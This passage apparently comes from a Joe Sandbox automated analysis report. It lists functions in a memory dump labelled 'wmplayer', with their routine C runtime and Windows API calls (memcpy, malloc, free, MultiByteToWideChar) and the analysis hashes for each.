                                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 231171946-0
                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3669619086-0
                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                            • free.MSVCRT ref: 00417425
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2605342592-0
                                                                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5